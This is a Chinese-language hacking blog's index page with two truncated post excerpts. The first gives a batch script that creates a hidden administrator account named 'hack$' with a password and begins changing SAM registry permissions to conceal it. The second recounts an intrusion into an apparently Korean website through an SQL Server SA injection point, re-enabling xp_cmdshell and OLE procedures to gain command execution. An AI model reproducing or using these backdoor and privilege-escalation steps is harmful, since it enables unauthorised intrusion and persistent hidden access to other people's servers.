天黑再动手

该文被密码保护。 阅读全文

摘要： 一款蛮不错的脚本,免去了到注册表导来导去的麻烦.一段隐藏用户的bat，注意脚本中的$不能去掉.net user hack$ ABCabc123!@# /addnet localgroup administrators hack$ /addEcho HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.iniEcho HKEY_LOCAL 阅读全文

摘要： 下午搞了一个站，存在sa注入点漏洞，window 2000+iis5。通过注入点信息，发现sqlserver版本为7.00，以前见过一次这个版本，不过没有怎么深入研究，朋友扫弱口令扫描到的，当时也提权了，具体忘记了。附图：扫描这个ip地址发现只对外开放了53跟80，韩国的鸟站，由此猜测可能为内网或者外网但是限制了对外开放的端口。一般情况下会开启1433，跟3389的但是限制对外连接。sqlserver7.0的虽然以前搞过，但是忘记具体怎么弄了，于是一步一步的先用穿山甲自带的功能恢复xp_cmdshell,sp_oa**,sp_***job,还有一个sandboxmode沙盒模式。都开启之后，随 阅读全文